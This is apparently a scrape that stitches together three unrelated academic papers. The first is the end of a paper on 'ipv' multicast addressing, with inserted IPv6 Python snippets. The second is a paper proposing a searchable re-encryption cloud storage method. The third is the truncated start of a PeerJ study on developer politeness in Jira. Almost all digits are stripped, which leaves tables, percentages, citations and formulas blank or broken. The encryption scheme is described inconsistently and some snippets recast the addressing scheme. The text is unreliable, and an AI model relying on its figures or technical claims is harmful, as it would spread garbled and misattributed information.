all routers and all routers in range (scop= , same site): [ ] [ ] [ ] ) the requested node multicast address: the requested node multicast address ranges from [ ] [ [ to [ ] [ [ . the requesting node is a node for detection probe target node is the neighbor (there may be multiple simultaneous). in the process of neighbor discovery, the requested node multicast address is used as the address identifier of the requested target node, and its scope is on the local link. b. distribution of multicast addresses the assignment process of the multicast address is the assignment of the multicast address group identification. in the format structure of the multicast address, the group representation is allocated bits of space. in theory, these bits can allocate different group identifiers. however, because the current multicast ethernet embodiment only the lower bits of the ipv multicast address mapped to the mac address of ieee , and the processing of the token ring network multicast address will also be different, in order to ensure ipv can be generated on the basis of the multicast address of the mac address is unique, is currently only available in the bit group identification assigned to the lower bits of the group identifier, the remaining bits are reserved (set to all zeros), the multicast address format is shown in table . table x. multicast address format with - bit group identification bits bits bits bits bits sign range of action group identification the above scheme limits the permanent group identification of the ipv multicast address to , which has been able to meet the currently foreseeable needs. if the need for group identification exceeds this international journal of advanced network, monitoring and controls volume , no. , limit in the future, multicast will still work but the processing speed will be slightly reduced; with the development of network equipment in the future, the -bit group identification space can be fully utilized. vi. summary ipv has a huge address capacity, can be compatible with ipv and ipv , and uses a special encryption mechanism to make the network environment more secure. the application of ipv is being promoted in china, especially in the government, banking and other departments. this paper summarizes the current ipv address structure, including ipv unicast address structure, cluster address structure and multicast address structure, etc., and introduces the compatible address format of ipv , ipv to ipv transition, and the aggregatable global unicast address. the aggregation logo provides a corresponding basis for future application development based on ipv . reference [ ] xie jianping etc. a method of assigning addresses to network computers using the full decimal algorithm[p]. cn: zl . , . . . [ ] xie jianping etc. method of using whole digital code to assign address for computer [p]. us: , . . [ ] zang qianli etc. a survey on ipv address structure standardization researches [j]. chinese journal of computers. : - [ - - ]. [ ] v. fuller, t. li,network working group. classless inter-domain routing (cidr): an address assignment and aggregation strategy, rfc- , . . [ ] xie xiren. the concise tutorial on computer network [m]. publishing house of electronics industry, . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . 
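before leaving the addressing discussion, the multicast format of section v can be sketched in code: building an address from the flag, scope and group identification fields, deriving the requested (solicited) node multicast address, and mapping its low-order 32 bits onto an ethernet mac address. the field widths (8-bit ff prefix, 4-bit flag field with the t bit lowest, 4-bit scope, 112-bit group identification) and the fixed 33:33 mac prefix are the conventional ipv6 values and are assumed here rather than read off the tables above.

```python
import ipaddress

# Multicast address from its parts (assumed widths: 8-bit ff prefix,
# 4-bit flags with the T bit as the lowest bit, 4-bit scope, 112-bit group id).
def multicast(t_bit: int, scope: int, group_id: int) -> ipaddress.IPv6Address:
    return ipaddress.IPv6Address((0xFF << 120) | ((t_bit & 1) << 116)
                                 | (scope << 112) | group_id)

print(multicast(0, 0x2, 1))         # ff02::1 (all nodes, link-local scope)

# Requested (solicited) node multicast address: ff02::1:ff00:0 plus the
# low-order 24 bits of the target unicast address.
def solicited_node(target: str) -> ipaddress.IPv6Address:
    low24 = int(ipaddress.IPv6Address(target)) & 0xFFFFFF
    return ipaddress.IPv6Address(int(ipaddress.IPv6Address("ff02::1:ff00:0")) | low24)

# Ethernet mapping: only the low 32 bits of the group identification are
# appended to the fixed 33:33 multicast MAC prefix.
def multicast_mac(group: ipaddress.IPv6Address) -> str:
    low32 = int(group) & 0xFFFFFFFF
    return "33:33:" + ":".join(f"{(low32 >> s) & 0xFF:02x}" for s in (24, 16, 8, 0))

sn = solicited_node("2001:db8::20c:29ff:fe12:3456")
print(sn, multicast_mac(sn))        # ff02::1:ff12:3456 33:33:ff:12:34:56
```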
international conference on sensor network and computer engineering (icsnce )

a searchable re-encryption storage method in cloud environment

wang hui, hong bo, tang junyong
school of computer science and engineering, xi'an technological university, xi'an, china
e-mail: @qq.com

abstract: traditional cloud storage systems do not adapt well to different application environments and do not guarantee the integrity and confidentiality of cloud data. in order to solve the problems caused by the hysteresis and density of traditional storage methods in the cloud storage system, a searchable re-encryption storage method (srecsm) is proposed in this paper. the central idea of srecsm is to generate a re-encryption key and decrypt only when the keyword matches. simulation results show that the srecsm introduced in this paper has better security and reliability.

keywords: cloud storage; re-encryption; decrypt; reliability

i. introduction
in order to meet various storage demands, cloud storage is designed to store data in the cloud and is widely used on the internet. compared with traditional data storage, it greatly improves the efficiency of mass data storage and the utilization of network resources. reducing the time a user waits to download a requested file from the network is essential for the client's quality of experience. at the same time, cloud storage faces serious security and efficiency problems [ ]. traditional cloud storage systems do not adapt well to different application environments and do not guarantee the integrity and confidentiality of cloud data, so it is dangerous for sensitive data to be stored directly in the cloud. the reliability of mobile cloud storage depends on how strongly system storage efficiency is affected when the storage solution fails [ ]. storing sensitive data on an un-trusted server is therefore a challenging issue [ ]. simple encryption techniques have key-management issues and cannot support complex requirements such as query, parallel modification, and fine-grained authorization. to guarantee confidentiality and proper access control of sensitive data, classical encryption is used [ ]. to solve the problems caused by the hysteresis and density of traditional storage methods in the cloud storage system, this paper proposes srecsm, a searchable re-encryption storage method.

ii. related work
efforts have been made by researchers, developers, practitioners, and educators to identify and discuss the technical challenges and recent advances related to cloud storage. han et al. [ ] proposed multi-path data prefetching in mobile cloud storage. wang et al. [ ] presented an optimized replica distribution method (ordm) in cloud storage systems. chen et al. [ ] proposed a new metric called joint response time, which considers not only the waiting time when the requested data are unavailable but also the queuing delay and service time when data become available. tysowski et al. proposed several useful schemes in [ ]. one is a manager-based re-encryption scheme (mres), which accomplishes security through proxy re-encryption; the other cryptographic scheme proposed in [ ] is a cloud-based re-encryption scheme (cres). although mres and cres make up for the limitations of existing schemes, both are more complex and need more time to re-encrypt.
[ ] propose proxy re-encryption algorithm to confirm the security of the datain thecloud, which can alleviate the client's burden, and enhance the confidentiality of cloud data. however, there are two major disadvantages with these techniques. first, for re- encryotion, the data owner must obtain user's public key before uploading. second, because the same plaintext is used with different keys gerenated by proxy, therefore, the storage overhead becomes excessive. iii. searchable re-encryption method the central idea of the searchable re-encryption is to generate a re-encryption key and decrypte while the keyword matched. by using searchable re-encryption method, srecsm may increase the storage requirements because all the encrypted data must be stored. the objective of the proposed searchable re-encryption method is to improve the storage requirements, bring down the security risks, minimize the scheduling time, overhead ratio and the storage cost. this technique will not provide the effective data utilization. the new method srecsm is easier and faster to implement in the cloud while sorting the matrix by using the searcherable keyword. srecsm would reduce the cost and the time complexity will be reduced. a. symbol definitions symbols in the searchable re-encryption method are defined in the in table i. mailto:a.author@email.com http://cn.bing.com/dict/search?q=cloud&form=bdvsp &mkt=zh-cn http://cn.bing.com/dict/search?q=storage&form=bdvsp &mkt=zh-cn international conference on sensor network and computer engineering (icsnce ) table i. symbol definition symbol definition pr(key) private key of the user pu(key) public key of the user key(wd) keyword db database ed(key) editing keyword en(dat) encrypted data pr(key)re re-encrypted private key pu(key)re re-encrypted public key ed(dat) re re-encrypted encrypted data de(dat) decrypted data key(u) keyword got through the public key key(r) keyword got through the private key sen sender rec receiver ser cloud server b. keyword editing the keyword can be edited in three cases while searching. we can edit the keyword while inserting, deleting or substituting. let us suppose that n is this notation and the keyword edited is  ed key . case if  ~= ( )ed key n i inserting the character into the first place for example: character string (old) = ‘‘bok’’ if = i ;  ~= ( )ed key n in third place have to insert new character character string (new) = ‘‘book’’ case if   ( )ed key n i deleting the character into the first place for example: character string (old) = ‘‘bok’’ if = i ;   ( )ed key n in third place have to delete the letter character string (new) = ‘‘bo’’ case if   ( )ed key n i substitute the character into the first place for example: character string (old) = ‘‘bok’’ if = i ;   ( )ed key n the third position in the keyword is replaced with a new character character string (new) = ‘‘bok’’ these three different cases can help us edit the keywords easily. the user handles some of the wrong situations by using the keyword. and we can edit the keyword to recover errors through these three different situations. c. searchable re-encryotion the core of the searchable re-encryption method is to generate a re-encryption key only when the keyword matches to the character. re-encryption operates over two groups g and g of prime order q with a bilinear map e : g g g  . the parameters of the cloud system are random generators g g and   ,z e g g g  . the searchable re-encryption can be defined in the following algorithms. 
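before walking through those algorithms, the three keyword-editing cases described above (insert, delete or substitute a character at position i) can be sketched as follows. the function name and the 1-based position convention are mine, not the paper's; only the three cases and the 'bok'/'book' style examples follow the text.

```python
# Minimal sketch of the three keyword-editing cases.
def edit_keyword(keyword: str, case: str, i: int, char: str = "") -> str:
    pos = i - 1                               # the paper counts positions from 1
    if case == "insert":                      # case 1: insert char at position i
        return keyword[:pos] + char + keyword[pos:]
    if case == "delete":                      # case 2: delete the character at position i
        return keyword[:pos] + keyword[pos + 1:]
    if case == "substitute":                  # case 3: replace the character at position i
        return keyword[:pos] + char + keyword[pos + 1:]
    raise ValueError("unknown edit case")

print(edit_keyword("bok", "insert", 3, "o"))       # 'book'
print(edit_keyword("bok", "delete", 3))            # 'bo'
print(edit_keyword("bok", "substitute", 3, "x"))   # 'box'
```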
next, the algorithm is described in detail. in algorithm , the keywords should be searched first. the file would be decrypted with this keyword only when the keyword matches. and then the data can be received, stored, and accessed in the cloud. algorithm : searching keyword input: keyword for ( )pr key output: keyword matching if ( ) ( )pr key key wd goto  db i else if ( ) ( )ed key n i \\ case- goto  db i keyword not matching else if ( ) ( )ed key n i \\ case- keyword matching" end if the keywords are included in the private key and will be searched in the database. keyword contained in the private key should be validated in the cloud storage database. in the cloud system, the data will be transmited to the servers and then be stored in the database. data can be accessed from the database through this keyword. the mode of "keyword editing " can be used to insert, delete, and replace when the keyword does not match. on the contrary, the data will be received from the cloud server once the keyword matches. algorithm : sharing data generate ( )pu key and ( )pr key   ( )= ( ),pu key en dat key u   ( )=pr key key r sen shares ( )pu key to ser sen shares ( )pr key to rec send ( )en dat to ser rec sends  key r to ser ser verify  key r if  key u =  key r ser sends   ( ),de dat key r to rec end if the data may be shared between the owners and the users through the cloud server, which is introduced in detail in algorithm . first, the public key and the private key will be created by the data owners. next, the public key is shared to the cloud server and the private key is shared to the data receiver. there is the keyword in each private key and public key, and the data users can retrieve data through this international conference on sensor network and computer engineering (icsnce ) keyword. finally, the data will be transfered by the cloud server only when the keyword of the public key and the keyword of the private key is matched. algorithm : encrypting data define two prime numbers as s and t assign r s t  , where r will be used for the module of the private key and the public key assign euler’s function as    ( ) e r s t   assign i as integer and   i e r  for all   , i e r  in which, i and  e r are co-prime assign   , , , nd f f f  ; f as file, d as data and n as the number of the files.          , , , nd r f r f r f r  encrypted data,     ( ) ( ); ( ),en dat d r mod e r key wd pu key algorithm introdeces the scheme of data encryption, in which the data will be encrypted through the rsa algorithm. first, the two prime numbers are multiplied together, and then compute the product. each data may be encrypted with euler’s function of  e r . keyword of the public key and private key are contained in encrypted data. and each data is modeled by using function of  e r . algorithm : re-encrypting data generate   re pr key ,   re pu key assign   , , , nd f f f  , g g ; f as files, d as the data and n as the number of the files.          , , , nd r f r f r f r  re-encrypted data, re ( ) ( ( ), ( )) m m re ed c pu pu key ed c algorithm introdeces the scheme of data re-encryption, in which the data will be encrypted through the aes algorithm. the re-encryption keys for authorized user's list will be generated by the user 'm'. the public key and private key of the users' can be used by 'v'. 
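stepping back to algorithm 3, the key setup and encryption it describes appear to be textbook rsa: two primes s and t, modulus r = s*t, euler's function (s-1)(t-1), a public exponent i coprime with it, and the modular decryption of algorithm 5 as the inverse operation. the sketch below uses toy numbers and standard rsa notation; it is my reading of the algorithm rather than the authors' exact scheme, and the pairing-based re-encryption of algorithm 4 is not reproduced.

```python
from math import gcd

# Toy RSA-style setup (do not use such small primes in practice).
s, t = 61, 53                     # two primes
r = s * t                         # modulus shared by both keys
phi = (s - 1) * (t - 1)           # Euler's function of r

i = 17                            # public exponent, coprime with phi
assert gcd(i, phi) == 1
d = pow(i, -1, phi)               # private exponent (modular inverse, Python 3.8+)

data = 1234                       # one block of file data encoded as an integer < r
encrypted = pow(data, i, r)       # encryption with the public key (i, r)
decrypted = pow(encrypted, d, r)  # the modular decryption of algorithm 5
assert decrypted == data          # decryption recovers the original block
print(encrypted, decrypted)
```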
re re ( ) ( ) ( ) ,i m x x i pu key pr key g v v    the csresm generates the * i q v z and encrypts the data through the following steps randomly: ( ) i i v v new z z pu key  ( ( ) ) ( )i i v v new en dat z z m   ( ) , ( )i i m v v x en c z m en cm g   the encrypted data ' ( )en c ' will be uploaded through csresm and ' ( ) m en c ' represents the mobile user 'm'. the csresm transforms ' ( ) m en c ' into ' ( ) m re en c ' using the re-encryption key re ( )pu key and ( ) m en c as shown in the following equation: re ( ) ( ( ), ( )) m m en c e pu key en c = , ( ) i m m i x x x v e g g = ( ) i i x v e g g, algorithm : decrypting data consider d key =  ( ), ( )pr key key wd for f  to n //data files   ( ) ( )de dat en dat mod pr key end for f loop goto ( )de dat algorithm introdeces the scheme of data decryption, in which the data will be decrypted through the steps described above. first, the decryption key will be used by the user, and the decryption key contains the keyword of the private key. after selecting the number of files, the data will be decrypted through modulo function. d. security analysis assuming that the reliability of the cloud storage system is identified by symbol a . the time of encryption through different encryption algorithms is t a , the encryption time t a is reversed first , and after the normalization processing , j a is got from t a .the storage cost of the different node is normalized to be thevalue k a . the number of the storage states for the cloud storage is the value n the reliability model of the system is shown in formula ( ). [ ( ) ][ ( ) ] n n j k a a a      it can be concluded from the analysis of the reliability model. when the vale t tends to be infinite, which means t  , the storage cost of the node in the cloud system also tends to a certain stable value, and the state of storage strategy tends to be stable. when the value of j a and k a are more closer to , and the value of n is more large, the cloud storage system will be more reliable and with higher security. iv. experiment the proposed scheme srecsm searchable re- encryption storage method was developed and verified through python. the real-time ability, security and reliability of srecsm was evaluated through a series experiments. in this part, we analyzed the prediction, the searching time, searching efficiency and storage space while performing moving, copying, encryption, re-encryption, storing and decryption. the final experimental results are comparative analyzed with the existing technologies including cres and international conference on sensor network and computer engineering (icsnce ) mres, and the results show that srecsm has better security and reliability. a. uploading and downloading of srecsm the data response tests are performed on file upload, file copy and file movement, for large files and small files respectively.it can be known that percent of transactions in a mobile cloud storage system can be implemented quickly within two seconds. the experimental results show that the system responds fast. table Ⅱ and table iii are the test result. table ii. the performance of the mobile end upload the data type of test utilization rate of mobile cpu (%) transmissio n rate (mbps) utilization rate of mobile /transmission rate raw data . . . after the encryption . . . 
the ratio of cpu occupancy to upload speed is shown in table Ⅱ, which the data on the mobile side are tested before the encryption and after the encryption respectively. table iii. the performance of the mobile end download the data type of test utilization rate of mobile cpu (%) transmissi on rate (mbps) utilization rate of mobile /transmission rate raw data . . . after the encryption . . . the ratio of cpu occupancy to download speed is shown in table iii, which the data on the mobile side are tested before the decryption and after the decryption respectively. it can be known from the table Ⅱ and the table iii, if the encryption and decryption mechanism are used for transmission, then the cpu utilization will be increased by an average of % ~ % and the overall file transfer rate will be reduced by % ~ %. as we can see,when the encryption and the decryption mechanism are used, more than three times the performance loss can be caused on the mobile end side. b. encryption and re-encryption srecsm the keyword can be set and searched in proposed method srecsm. only if the value of the keyword just matches, data can be received. suppose that the number of the users in proposed method srecsm is users, and the available number of the searching keywords range from to . the cloud server store the keywords and all encrypted data through the database. there are two questions to be considered: one is the impact of encryption and decryption on file speed.the other is the impact of encryption and decryption on the performance of the client host. the experimental data are listed in table iv, which includes the time spent on encrypting the different sizes or different type files by using srecsm and the time spent on transmitting the file. table iv. time comparison on encryption and decryption by using srecsm file size (m) file type srecsm encryption (ms) hds upload (ms) srecsmdecr yption (ms) hds download (ms) . pdf . mp . mkv . doc . rmvb it can be concluded from the above test data, the time spent on encryption or decryption by using srecsm is regardless of the file type. the same size files are encrypted by different cres, mres, or srecsm algorithms and then the re-encryption time is different, as shown in table v and figure . the . mb file in table v is the test case. figure . comparison of re-encryption time in the srecsm proposed in this paper,the time of encryption or decryption is relatively short. it may take a relatively long time to encrypt files by using the cres, which cause a significant additional time overhead for hdfs. however, the encryption time that mres encrypting the file was not significantly increased compared to srecsm. besides the impact on overall transmission rates, the impact of encryption and decryption on mobile performance is also important. table v. time comparison for different algorithm encryption file size (m) mres re-encrypt (ms) cresre- encrypt (ms) srecsmre -encrypt (ms) . . . . the comparison of the storage space required in different schemes is shown in figure a. as the number of keywords increase, the storage space required by the cloud system also becomes larger. more storage space have been required by the existing schemes such as cres and mres. however, we international conference on sensor network and computer engineering (icsnce ) can see in figure a that srecsm utilize the data transfer effectively and moreover reduce the storage space requirements in the system. figure . 
comparison while increasing the number of keywords it can be observed from the trends presented in figure b that the searching time varies according to the number of keywords. the available number of the searching keywords range from to . as the number of keywords increases, searching time required by the system also increase. more searching time have been need by cres and mres. and we can see in figure b that lesser time was need to search using srecsm. if the searching keyword does not match, srecsm will immediately use the edit function. mres, cres, and srecsm offload the re-encryption operations in cloud system. and then in the following experiment, we examined the energy consumption and turnaround time while the re-encryption operation were performed. the experimental results are shown in fig. . figure . comparison while re-encryption and decryption we can see from figure a and b, while re-encryption operations were performed in mobile terminal, the turnaround time and energy consumption will increase according to the file size increases.in the same way, figure c and d show that, while decryption operations were performed in mobile terminal, the turnaround time and energy consumption will increase according to the file size increases. using the reliability model formula ( ) of the cloud storage system proposed in . , combine the time required for processing the same size of file in table iii, when a different algorithm cres,mres and srecsm is used, the encryption time required for encrypting file, after that the encryption time is reversed, j a then be got after the encryption time is normalized.in the same way, after normalizing, storage cost k a is got. if both j a and k a are closer to , and the number of storage state in the cloud storage system is larger, then the reliability of the system is higher. according to the above analysis,the data in one hour is sampled continuously, combined with the data in table iii and table iv, the reliability contrast diagram for srecsm is shown in figure . figure . the reliability contrast diagram it can be know the reliability of the system through different algorithm by comparing the data in figure .the reliability of the system is relatively high. that is, it has little impact on file transfer and user experience by using cres re-encryption. it may take a relatively long time to re- encrypt files by using the mres.however, the re-encryption time that mres combined with cres for re-encrypting the file was not significantly increased compared withcres. the value of the reliability is consistent with the use of cres, which can be maintained around one. it is concluded that the system is relatively reliable by using srecsm encryption. through these simulation experiments, it is verified that srecsm has a good user experience. it is also verified that the mechanism of srecsm can effectively improve the efficiency of the cloud storage.when a mobile terminal makes a request, the optimal node is selected and then the time can be saved effectively. in the srecsm presented in this paper, the re-encryption and decryption has the following characteristics:transport security and storage security of the user data are guaranteed. v. conclusions and future work the existing schemes such ascloud-based re-encryption scheme cres and manager-based re-encryption scheme mres re-encrypts the keyword to transmit safety. 
but these two schemes are more complex and need more time to re- international conference on sensor network and computer engineering (icsnce ) encrypt. in order to reduce the computational complexity, enhance the secure transmission,a new scheme srecsm is proposed.srecsm has high reliability proved through a series of simulation experiments. turn around time and energy consumption of different size of files are compared and analyzed through these experiments. when the file size increases, proposed srecsm can achieve accurate predictions, reduce the storage space requirement and the re- encrypting time. finally, it is concluded that the srecsm proposed in this paper has better security and reliability. acknowledgment foundation item: the industrial research project of science and technology department of shaanxi province(grant no. ktzdgy - ); laboratory fund of xi'an technological university (gsysj ); research project on teaching reform of education in shaanxi province (grant no. jy ); characteristic disciplines in education department of shaanxi province (grant no. ); research project on teaching reform of xi 'an technological university (grant no. jgz ); the principal fund of xi'an technological university (grant no. xgyxjj- ). references [ ] jung, kye-dong, moon, seok-jae, kim, jin-mook: 'data access control method for multimedia content data sharing and security based onxmdr-dai in mobile cloud storage'.multimedia tools and applications, v , n , october , , pp - [ ] chekam, t.t., zhai, e., li, z., cui, y., ren, k.: 'on the synchronization bottleneck of openstack swift-like cloud storage systems'. in: ieee infocom - the th annual ieee international conference on computer communications, , pp. – [ ] li, l., li, d., su, z., jin, l., huang, g.: 'performance analysis and framework optimization of open source cloud storage system'. china commun. ( ), , pp. – [ ] iliadis, i., sotnikov, d., ta-shma, p., venkatesan, v.: 'reliability of geo-replicated cloud storage systems'. in: ieee th pacific rim international symposium on dependable computing, , pp. – [ ] han, lin; huang, hao; xie, chang-sheng: 'multi-path data prefetching in mobile cloud storage'. in: proceedings - international conference on cloud computing and big data, ccbd , march , , pp. - [ ] wang, yan; wang, jinkuan: 'an optimized replica distribution method in cloud storage'. journal of control science and engineering, v [ ] chen, ming-hung; tung, yu-chih; hung, shih-hao; lin, kate ching-ju; chou, cheng-fu: availability is not enough: minimizing joint response time in peer-assisted cloudstorage systems. ieee systems journal, v , n , december , pp. - [ ] tysowski, p.k., hasan, m.a.: 're-encryption-based keymanagement towards secure and scalable mobile applica-tions in clouds'. iacr cryptology e print archive , [ ] purushothama, b.r; shrinath, b.; amberker, b.b. : 'secure cloud storage service and limited proxy re-encryption for enforcing accesscontrol in public cloud'. international journal of information and communication technology, v , n , , pp. - submitted november accepted june published july corresponding author giuseppe destefanis, giuseppe.destefanis@brunel.ac.uk academic editor arie van deursen additional information and declarations can be found on page doi . /peerj-cs. copyright destefanis et al. distributed under creative commons cc-by . open access software development: do good manners matter? 
giuseppe destefanis , marco ortu , steve counsell , stephen swift , michele marchesi and roberto tonelli department of computer science, brunel university, london, united kingdom department of electrical and electronic engineering, university of cagliari, cagliari, italy abstract a successful software project is the result of a complex process involving, above all, people. developers are the key factors for the success of a software development process, not merely as executors of tasks, but as protagonists and core of the whole development process. this paper investigates social aspects among developers working on software projects developed with the support of agile tools. we studied open- source software projects developed using the agile board of the jira repository. all comments committed by developers involved in the projects were analyzed and we explored whether the politeness of comments affected the number of developers involved and the time required to fix any given issue. our results showed that the level of politeness in the communication process among developers does have an effect on the time required to fix issues and, in the majority of the analysed projects, it had a positive correlation with attractiveness of the project to both active and potential developers. the more polite developers were, the less time it took to fix an issue. subjects data mining and machine learning, data science, software engineering keywords social and human aspects, politeness, mining software repositories, issue fixing time, software development introduction high-level software development is a complex activity involving a range of people and activities; ignoring human aspects in the software development process or managing them in an inappropriate way can, potentially, have a huge impact on the software production process and team effectiveness. increasingly, researchers have tried to quantify and measure how social aspects affect software development. bill curtis claimed that ‘‘the creation of a large software system must be analyzed as a behavioural process’’ (curtis, krasner & iscoe, ). coordinating and structuring a development team is thus a vital activity for software companies and team dynamics have a direct influence on group successfulness. open-source development usually involves developers that voluntarily participate in a project by contributing with code-development. in many senses, the management of such developers is more complex than the management of a team within a company: developers are not in the same place at the same time and coordination therefore becomes more difficult. additionally, the absence of face-to-face communication mandates the use of alternative technologies such as mailing lists, electronic boards or issue tracking systems. in this context, being rude or aggressive when writing a comment or replying to a contributor can affect the cohesion of the group, its membership and the successfulness of a project. how to cite this article destefanis et al. ( ), software development: do good manners matter? peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:giuseppe.destefanis@brunel.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. 
on the other hand, a respectful environment provides an incentive for new contributors to join the project and could significantly extend the lifetime and usefulness of a project to the community. according to versionone (https://www.versionone.com/pdf/ -state-of-agile- survey.pdf) (versionone, ): ‘‘more people are recognising that agile development is beneficial to business, with an % increase over the last two years in the number of people who claim that agile helps organisations complete projects faster’’. a main priority reported by users was to accelerate time to market, manage changing priorities more easily and better align it and business objectives. agile project management tools and kanban boards experienced the largest growth in popularity of all agile tool categories, with use or planned use increasing by %. one of the top five ranked tools was atlassian jira (https://www.atlassian.com/software/jira), with an % recommendation rate. agile boards represent the central aspect of communication in the agile philosophy. according to perry ( ) ‘‘the task board is one of the most important radiators used by an agile team to track their progress.’’ the jira board is a good solution for bridging the gap between open-source software development and the agile world. it is the view of many that agile development requires a physical aspect, i.e., developers working together in the same room or building, or at the same desk; the pair programming paradigm, for example, requires at least two people working simultaneously on the same piece of code. by using tools such as the jira board (fig. ) it is possible to use an agile board for development of a project by developers in different physical places. working remotely, in different time zones and with different time schedules, with developers from around the world, requires coordination and communication. the jira board displays issues from one or more projects, giving the possibility of viewing, managing and reporting on work in progress. it is possible to use a board that someone else has created, or create as many boards as needed. when a new developer joins a development team, the better the communication process works, the faster the new developer can become productive and the learning curve reduced. the notion of an agile board therefore places emphasis on the know-how and shared-knowledge of a project being easily accessible for the development team throughout the development process. fast releases, continuous integration and testing activities are directly connected to the knowledge of the system under development. the potential for agile boards to simplify development across geographically disparate areas is in this sense relatively clear. in a similar vein, the social and human aspects of the development process are becoming more and more important. the google work style has become a model for many software start-ups: a pleasant work environment is important and affects the productivity of employees. one important contributor to a healthy work environment is that each employee is considerate and polite towards their fellow employees. collins dictionary (http: //www.collinsdictionary.com/dictionary/english/polite) defines politeness as ‘‘showing regard for others, in manners, speech, behaviour, etc.’’ we focus on the politeness of the comment-messages written by the developers. 
the research aims to show how project management tools such as agile boards can directly affect the productivity of a software development team and the health of a software project. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.versionone.com/pdf/ -state-of-agile-survey.pdf https://www.versionone.com/pdf/ -state-of-agile-survey.pdf https://www.atlassian.com/software/jira http://www.collinsdictionary.com/dictionary/english/polite http://www.collinsdictionary.com/dictionary/english/polite http://dx.doi.org/ . /peerj-cs. figure example of jira board with issues. the state of the art tool developed by danescu-niculescu-mizil et al. ( ) was used to evaluate politeness within comment-messages. the authors proposed a machine learning approach for evaluating the politeness of a request posted in two different web applications: wikipedia (https://en.wikipedia.org/wiki/main_page) and stack overflow (http://stackoverflow.com). stack overflow is well known in the software engineering field and is largely used by software practitioners; hence, the model that authors used in danescu-niculescu-mizil et al. ( ) was suitable for our domain based on jira issues, where developers post and discuss about technical aspects of issues. the authors provide a web application (http://www.mpi-sws.org/~cristian/politeness.html) and a library version of their tool. to prepare the training set for the machine learning approach, over , utterances were labeled using amazon mechanical turk. the authors decided to restrict the residence of the annotators to the us and conducted a linguistic background questionnaire. since ‘‘politeness is a culturally defined phenomenon and what is considered polite in one culture can sometimes be quite rude or simply eccentric in another cultural context’’ (http://en.wikipedia.org/wiki/politeness), the choice of limiting the residence of the annotators to the us could be interpreted as a weakness of the the tool. however, the annotators analysed comments written by authors from around the world and not only destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://en.wikipedia.org/wiki/main_page http://stackoverflow.com http://www.mpi-sws.org/~cristian/politeness.html http://en.wikipedia.org/wiki/politeness http://dx.doi.org/ . /peerj-cs. from the us. therefore, the possible bias introduced by annotators with a similar cultural background, is reduced and the different cultures of the developers involved in the analysis considered. the use of the tool would have been problematic, if annotators were from the us and they had analysed only comments written by authors from the us. we considered open source projects from one of the largest datasets of issues reports openly available (ortu et al., d). this paper aims to answer the following research questions: • does a relationship exist between politeness and issues fixing time? issue fixing time for polite issues is shorter than issue fixing time for impolite and mixed issues. • does politeness among developers affect the attractiveness of a project? magnetism and stickiness are positively correlated with the percentage of polite comments. • does the percentage of polite comments vary over time? the percentage of polite comments does vary over time and in some cases it changes from lower percentage of polite comments to higher percentage of polite comments from two consecutive observation intervals. 
the percentage of polite comments over time is (for the majority of the projects in our corpus) seasonal and not random. • how does politeness vary with respect to jira maintenance types and issue priorities? comments related to issues with maintenance bug, priority minor and trivial, tend to have a higher percentage of impolite comments. issues with maintenance new feature, priority blocker and critical tend to have a higher percentage of polite comments. this paper is an extended version of earlier work by the same authors (ortu et al., b). we added eight new systems to the original corpus analysed in (ortu et al., b) and two new research question (rq and rq ), we also reviewed the rq performing deeper statistical analysis. the remainder of this paper is structured as follows: in the next section, we provide related work. ‘experimental setup’ describes the dataset used for this study and our approach/rationale to evaluate the politeness of comments posted by developers. in ‘results,’ we present the results and elaborate on the research questions we address. in ‘discussion’ we present a discussion on the obtained results and ‘threats to validity’ discusses the threats to validity. finally, we summarise the study findings and present plans for future work in ‘conclusions and future work.’ related work a growing body of literature has investigated the importance and the influence of human and social aspects, emotions and mood both in software engineering and software development. research has focused on understanding how the human aspects of a technical discipline can affect final results (brief & weiss, ; capretz, ; cockburn & highsmith, ; erez & isen, ; kaluzniacky, ), and the effect of politeness (novielli, calefato & lanubile, ; tan & howard-jones, ; winschiers & paterson, ; tsay, dabbish & herbsleb, ; rousinopoulos, robles & gonzález-barahona, ). destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. feldt et al. ( ) focused on personality as a relevant psychometric factor and presented results from an empirical study about correlations between personality and attitudes to software engineering processes and tools. the authors found that higher levels of the personality dimension ‘‘conscientiousness’’ correlated with attitudes towards work style, openness to changes and task preference. it companies are also becaming more conscious of social aspects. ehlers ( ) evaluated the efforts of it companies in acquiring software engineers by emphasizing socialness in their job advertising. the research analyzed , jobs advertising from the recruiting platform indeed and about , job ads from stackoverflowcareers to investigate correlations between social factors and the employee satisfaction of a work place. the findings showed that many companies advertise socialness explicitly. the manifesto for agile development indicates that people and communications are more essential than procedures and tools (beck et al., ). studies have also investigated the relationship between affect and work-related achievements, including performance (miner & glomb, ) and problem-solving processes, such as creativity, (amabile et al., ). furthermore, strong evidence for emotional contagion on all its possible polarities has been found in a recent very large scale study (kramer, guillory & hancock, ). therefore, affect is an interesting avenue for research in software engineering. steinmacher et al. 
( ) analyzed social barriers that obstructed first contributions of newcomers (new developers joining an open-source project). the study indicated how impolite answers were considered as a barrier by newcomers. these barriers were identified through a systematic literature review, responses collected from open source project contributors and students contributing to open source projects. roberts, hann & slaughter ( ) conducted a study which revealed how the different motivations of open-source developers were interrelated, how these motivations influenced participation and how past performance influenced subsequent motivations. guzman & bruegge ( ) and guzman ( a) have proposed prototypes and initial descriptive studies towards the visualization of affect over a software development process. in their work, the authors applied sentiment analysis to data coming from mailing lists, web pages, and other text-based documents of software projects. guzman et al. built a prototype to display a visualization of the affect of a development team, and they interviewed project members to validate the usefulness of their approach. in another study, guzman, azócar & li ( ), performed sentiment analysis of github’s commit comments to investigate how emotions were related to a project’s programming language, the commits’ day of the week and time, and the approval of the projects. the analysis was performed over top-starred github repositories implemented in different programming languages. the results showed java to be the programming language most associated with negative affect. no correlation was found between the number of github stars and the affect of the commit messages. panichella et al. ( ) presented a taxonomy to classify app reviews into categories relevant to software maintenance and evolution, as well as an approach that merges three techniques (natural language processing, text analysis, sentiment analysis) to destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. automatically classify app 